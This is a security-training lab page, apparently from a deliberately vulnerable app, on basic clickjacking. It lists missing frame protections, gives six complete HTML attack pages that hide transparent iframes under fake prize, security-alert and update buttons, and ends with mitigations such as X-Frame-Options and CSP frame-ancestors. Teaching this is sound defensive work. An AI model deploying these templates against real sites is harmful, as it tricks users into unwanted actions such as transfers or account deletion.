Lab 1: Basic Clickjacking

Basic clickjacking attacks

Difficulty: Low

Lab Overview

This lab demonstrates basic clickjacking vulnerabilities where attackers can overlay malicious content on top of legitimate content to trick users into performing unintended actions.

Objective: Understand how clickjacking attacks work and how to exploit them.

Vulnerable Application
Social Media Platform

Welcome to our social media platform! Here are some actions you can perform:

Clickjacking Tester
⚠️ Clickjacking Warning

This lab demonstrates clickjacking vulnerabilities:

  • No X-Frame-Options - Missing frame protection
  • No Content Security Policy - Missing CSP frame-ancestors
  • No JavaScript protection - No clickjacking detection
  • Vulnerable buttons - Action buttons can be overlaid
Vulnerable Actions

These actions can be exploited via clickjacking:

  • Like Post - Social media manipulation
  • Follow User - Unwanted following
  • Share Content - Unwanted sharing
  • Delete Account - Account deletion
  • Change Password - Password changes
  • Transfer Money - Financial fraud
Action Results
Action Results:
No actions performed yet
Vulnerability Details
  • Type: Basic Clickjacking
  • Severity: Medium
  • Method: Overlay attacks
  • Issue: Missing frame protection
Attack Vectors
  • Overlay Attacks: Overlay malicious content
  • Button Manipulation: Trick users into clicking
  • Form Manipulation: Manipulate form submissions
  • Social Engineering: Combine with social engineering
Basic Clickjacking Examples

Use these techniques to exploit clickjacking vulnerabilities:

1. Basic Overlay Attack:
<!DOCTYPE html> <html> <head> <title>Clickjacking Attack</title> <style> .overlay { position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0, 0, 0, 0.8); z-index: 9999; } .fake-button { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); background: #007bff; color: white; padding: 20px 40px; border: none; border-radius: 5px; font-size: 18px; cursor: pointer; } .hidden-iframe { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); width: 300px; height: 200px; opacity: 0.1; z-index: 10000; } </style> </head> <body> <div class="overlay"> <button class="fake-button">Click here to win $1000!</button> <iframe class="hidden-iframe" src="http://vulnerable-site.com/clickjacking/1.php"></iframe> </div> </body> </html>
2. iframe-based Clickjacking:
<!DOCTYPE html> <html> <head> <title>iframe Clickjacking</title> <style> .container { position: relative; width: 100%; height: 100vh; } .fake-content { position: absolute; top: 0; left: 0; width: 100%; height: 100%; background: linear-gradient(45deg, #ff6b6b, #4ecdc4); display: flex; align-items: center; justify-content: center; font-size: 24px; color: white; z-index: 1; } .hidden-iframe { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); width: 200px; height: 100px; opacity: 0.01; z-index: 2; } </style> </head> <body> <div class="container"> <div class="fake-content"> <h1>🎉 Congratulations! You won a prize!</h1> </div> <iframe class="hidden-iframe" src="http://vulnerable-site.com/clickjacking/1.php"></iframe> </div> </body> </html>
3. CSS-based Clickjacking:
<!DOCTYPE html> <html> <head> <title>CSS Clickjacking</title> <style> .wrapper { position: relative; width: 100%; height: 100vh; background: #f0f0f0; } .fake-button { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); background: #28a745; color: white; padding: 15px 30px; border: none; border-radius: 5px; font-size: 16px; cursor: pointer; z-index: 1; } .hidden-iframe { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); width: 250px; height: 150px; opacity: 0.01; z-index: 2; } </style> </head> <body> <div class="wrapper"> <button class="fake-button">Download Free Software</button> <iframe class="hidden-iframe" src="http://vulnerable-site.com/clickjacking/1.php"></iframe> </div> </body> </html>
4. Advanced Overlay Attack:
<!DOCTYPE html> <html> <head> <title>Advanced Clickjacking</title> <style> .overlay { position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0, 0, 0, 0.9); z-index: 9999; } .fake-content { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); background: white; padding: 30px; border-radius: 10px; text-align: center; z-index: 10000; } .fake-button { background: #dc3545; color: white; padding: 15px 30px; border: none; border-radius: 5px; font-size: 18px; cursor: pointer; margin: 10px; } .hidden-iframe { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); width: 300px; height: 200px; opacity: 0.01; z-index: 10001; } </style> </head> <body> <div class="overlay"> <div class="fake-content"> <h2>⚠️ Security Alert</h2> <p>Your account has been compromised. Click below to secure it.</p> <button class="fake-button">Secure Account Now</button> </div> <iframe class="hidden-iframe" src="http://vulnerable-site.com/clickjacking/1.php"></iframe> </div> </body> </html>
5. Social Engineering Clickjacking:
<!DOCTYPE html> <html> <head> <title>Social Engineering Clickjacking</title> <style> .container { position: relative; width: 100%; height: 100vh; background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); } .fake-content { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); background: white; padding: 40px; border-radius: 15px; text-align: center; box-shadow: 0 10px 30px rgba(0, 0, 0, 0.3); z-index: 1; } .fake-button { background: #28a745; color: white; padding: 20px 40px; border: none; border-radius: 8px; font-size: 20px; cursor: pointer; margin: 20px; } .hidden-iframe { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); width: 350px; height: 250px; opacity: 0.01; z-index: 2; } </style> </head> <body> <div class="container"> <div class="fake-content"> <h1>🎁 Special Offer!</h1> <p>You've been selected for a special promotion!</p> <p>Click below to claim your reward.</p> <button class="fake-button">Claim Reward Now</button> </div> <iframe class="hidden-iframe" src="http://vulnerable-site.com/clickjacking/1.php"></iframe> </div> </body> </html>
6. Mobile Clickjacking:
<!DOCTYPE html> <html> <head> <title>Mobile Clickjacking</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style> .mobile-container { position: relative; width: 100%; height: 100vh; background: #f8f9fa; } .fake-app { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); background: white; padding: 30px; border-radius: 20px; text-align: center; box-shadow: 0 5px 15px rgba(0, 0, 0, 0.1); z-index: 1; } .fake-button { background: #007bff; color: white; padding: 15px 30px; border: none; border-radius: 25px; font-size: 16px; cursor: pointer; margin: 10px; } .hidden-iframe { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); width: 300px; height: 200px; opacity: 0.01; z-index: 2; } </style> </head> <body> <div class="mobile-container"> <div class="fake-app"> <h2>📱 New App Update</h2> <p>Update available! Tap to install.</p> <button class="fake-button">Install Update</button> </div> <iframe class="hidden-iframe" src="http://vulnerable-site.com/clickjacking/1.php"></iframe> </div> </body> </html>
Real-World Attack Scenarios
Mitigation Strategies
  • Implement X-Frame-Options header (DENY, SAMEORIGIN)
  • Use Content Security Policy (CSP) frame-ancestors directive
  • Implement JavaScript-based clickjacking protection
  • Use SameSite cookie attributes
  • Regular security testing and vulnerability assessments
  • Monitor for unusual user actions
  • Implement proper authentication and authorization
  • Use CAPTCHA for sensitive actions
  • Implement rate limiting and request validation
  • Educate users about clickjacking attacks